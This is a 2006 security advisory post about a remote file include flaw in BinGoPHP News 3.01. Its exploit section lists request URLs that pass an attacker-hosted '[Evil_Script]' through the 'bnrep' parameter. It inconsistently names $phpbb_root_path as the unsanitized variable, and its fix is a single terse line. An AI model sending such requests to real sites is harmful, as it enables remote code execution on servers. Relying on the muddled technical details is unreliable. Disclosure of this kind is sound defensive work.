BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability Sep 07 2006 08:59AM
ciriboflacs yahoo com
------------------------------------------------------------------------
---

BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

------------------------------------------------------------------------
---

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :

Remote : Yes

Critical Level : Dangerous

------------------------------------------------------------------------
---

Affected software description :

~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BinGoPHP News

version : 3.01

URL : http://www.comscripts.com/jump.php?action=script&id=1382

------------------------------------------------------------------

Exploit:

~~~~~~

Variable $phpbb_root_path not sanitized.When register_globals=on an attacker ca

n exploit this vulnerability with a simple php injection script.

# http://www.site.com/[path]/bp_ncom.php?bnrep=[Evil_Script]

# http://www.site.com/[path]/bp_news.php?bnrep=[Evil_Script]

------------------------------------------------------------------------
---

Solution :

~~~~~~~~

declare variabel $bnrep

------------------------------------------------------------------------
---

Shoutz:

~~~~

# Special greetz to my good friend [Oo]

# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]

------------------------------------------------------------------------
---

*/

Contact:

~~~~~~

Nick: Kw3rLn

E-mail: ciriboflacs[at]YaHoo[dot]Com

Homepage: hTTp://RST-CREW.NET

_/*

-------------------------------- [ EOF] ----------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus